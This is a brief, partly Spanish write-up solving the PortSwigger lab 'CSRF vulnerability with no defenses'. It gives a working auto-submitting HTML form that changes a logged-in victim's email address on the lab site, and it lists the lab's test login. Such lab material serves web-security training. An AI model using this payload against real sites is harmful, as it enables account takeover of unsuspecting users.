**Lab: CSRF vulnerability with no defenses**

This lab's email change functionality is vulnerable to CSRF.

To solve the lab, craft some HTML that uses a [CSRF attack](https://portswigger.net/web-security/csrf) to change the viewer's email address and upload it to your exploit server.

You can log in to your own account using the following credentials: wiener:peter

Mediante un proxy se intercepta el log referente al cambio de correo por parte del usuario. Con el se extrae la información para ejecutar esta sentencia:

<html>

<body>

<form method="POST" action="https://0a75003b03b2613c803a21ad00120066.web-security-academy.net/my-account/change-email">

<input type="hidden" name="email" value="anything@web-security-academy.net">

<input type="submit" value="Submit">

</form>

<script>

document.forms[0].submit();

</script>

</body>

</html>

